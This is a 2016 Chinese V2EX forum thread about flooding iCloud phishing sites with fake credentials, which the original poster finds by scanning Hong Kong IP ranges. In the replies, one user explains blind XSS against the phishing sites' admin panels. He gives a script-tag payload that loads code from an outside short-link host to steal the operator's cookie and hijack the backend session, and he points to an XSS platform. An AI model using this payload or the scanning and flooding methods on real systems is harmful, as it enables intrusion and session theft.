发现一大波 icloud 钓鱼网站。。。

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

推荐学习书目

› Learn Python the Hard Way

Python Sites

› PyPI - Python Package Index

› http://diveintopython.org/toc/index.html

› Pocoo

值得关注的项目

› PyPy

› Celery

› Jinja2

› Read the Docs

› gevent

› pyenv

› virtualenv

› Stackless Python

› Beautiful Soup

› 结巴中文分词

› Green Unicorn

› Sentry

› Shovel

› Pyflakes

› pytest

Python 编程

› pep8 Checker

Styles

› PEP 8

› Google Python Style Guide

› Code Style from The Hitchhiker's Guide

这是一个创建于 3026 天前的主题，其中的信息可能已经有所发展或是发生改变。

最近同学手机被偷了，不断收到各种骗 appleid 的短信和邮件。。做了点好事，往钓鱼网站里 post 了好多好多假数据，过几天他就关了😁

后来还是不断收到各种钓鱼网站，如法炮制，最后没几天也都关了

再后来发现 ip 基本都是香港的，于是写脚本对部分香港 ip 段扫了下，卧槽扫出 100 多个服务器。。。

于是给他们 post 点假数据：随机 9 位 qq 号 @qq.com/随机密码不知道有没有用，不过至少按照前面的情况，能让他们都关服就可以了。。

请问各位有没有钓鱼网址提供，如果和我见到的是同类型的，我可以帮忙造点假数据进去。。标题是 find my iphone ，模仿“找回我的 iPhone ”做的钓鱼网站

http://i2.piimg.com/567571/85f4ce3c10dbe286.jpg

钓鱼

post

都关服

网站

32 条回复 • 2017-03-10 08:35:37 +08:00

t333st

2016-07-21 17:40:32 +08:00

其实可以提交 xss

chroming

2016-07-21 17:49:02 +08:00

这个不错

leonis

2016-07-21 17:52:26 +08:00

干得好

aheadlead

2016-07-21 17:56:06 +08:00

干脆咱们建个 repo 然后维护一个 icloud 钓鱼站列表

loading

2016-07-21 18:09:10 +08:00 via Android

楼主挂了代理池没？不然一句 sql 就把你的假数据过滤了。

ji1043

2016-07-21 18:16:11 +08:00

好同志！话说你 Ip 怎么解决的？？？买的？

tracedocting

2016-07-21 18:17:55 +08:00

之前垃圾邮件里面有一堆钓鱼的，可惜随手删了……

SlipStupig

2016-07-21 18:28:37 +08:00

@aheadlead 没什么用，过两天人家就关站了

0x5e

2016-07-21 18:40:30 +08:00

@aheadlead 对的，没两天就关了
@loading 没挂，就改了改'X-Forwarded-For'，我看网站是 ASP.NET 的，被过滤我也没什么办法了，至少这几天试下来刷一两天他就关了，算是其中一个目的达成了吧。。。如果欺骗不了他，让他关站也是好的，避免后人上当么。。
@ji1043 我就是用自己电脑刷的。。

qfdk

2016-07-21 18:58:15 +08:00

用 xss 打它把这个比较好玩儿 :) 拿了后台直接删东西

0x5e

2016-07-21 19:03:20 +08:00

@qfdk 不会。。求指导

qfdk

2016-07-21 19:09:18 +08:00

@0x5e http://123.57.48.113/xss//index.php?do=login 注册个帐号，然后会有一个<script>xxx</script>的玩意儿，把假的用户名或者密码换成这个玩意儿，只要那个人浏览了要是没有做过滤，你会得到他的 cookie :) 然后火狐改个 cookie 就能直接登录后台了，打 QQ 片子屡试不爽

wilddog

2016-07-21 19:10:52 +08:00

0x5e

2016-07-21 19:15:20 +08:00

@qfdk 卧槽。。学习了。。我试下😁 多谢~

ctsed

2016-07-21 19:19:46 +08:00 via iPhone

你不管他也会关的生命周期很短有的类型就存活几个小时

iwj

2016-07-21 19:24:48 +08:00

想学习一下代码，可以分享一下吗

qfdk

2016-07-21 19:34:29 +08:00

@0x5e 这个平台我顺手百度的，可信行不知道，你可以用源码自己搭一个平台，乌云有说明

panda0

2016-07-21 19:38:13 +08:00

@qfdk 出错了

sephinh

2016-07-21 19:48:58 +08:00 via Android

干得好～～～

0x5e

2016-07-21 22:02:30 +08:00

@qfdk 各种注册失败。。完了我感觉被套路了😂
能给个关键字不，就叫 xss 平台吗，乌云现在进不去了。。

qfdk

2016-07-21 22:08:20 +08:00

@0x5e xssplatform.zip 找一个叫做这个东西的，然后自己搭建。

0x5e

2016-07-21 22:16:59 +08:00

@qfdk 多谢，不过我刚试了下，我扫的这些服务器应该是处理过了。。😁

0x5e

2016-07-21 22:20:08 +08:00

@iwj 写的有点挫，而且钓鱼网站多种多样可能没法通用。。。
https://gist.github.com/0x5e/3125096158adddc45a5a9351a7418942

0x5e

2016-07-21 22:24:08 +08:00

@ctsed 可能吧，不过感觉这网站也挺挫的，要是真心想过滤的话可以搞个 ip 防火墙什么的，说不准也没记录下账号密码对应的 ip ，又或许说不准 ip 是从 X-Forwarded-For 取的。。反正闲着也是闲着我就开着刷一下吧。。😁

DravenJohnson

2016-07-22 10:02:50 +08:00

还有这东西？

Ra8er

2016-07-22 11:18:06 +08:00

见一个日一个

njutree

2016-07-22 13:11:09 +08:00

干的漂亮，对于这些人就该给他们大量的假数据让他们干不了坏事。

fishcat

2016-07-22 15:42:47 +08:00

@qfdk 你的那个网站我不能注册

qfdk

2016-07-22 15:46:07 +08:00

@fishcat 上都说了是顺手百度的- - 需要的自己搭建就好了

qfdk

2016-07-22 15:50:07 +08:00

最简单的方法是写个 form ，这样网站的 js 都用不了，然后 user 写上你得到的代码<script src=http://t.cn/Rt2iRuv></script> passwd 也可以，最后这个会插入他们数据库，如果没有过滤的话，当他们打开你会得到 cookie ，其中还有 keepsession 的选项

meppy

2016-07-22 18:25:43 +08:00

都是高手，学习了

cybermay

2017-03-10 08:35:37 +08:00

你不灌数据他也会关的骗到了账号就会关然后再开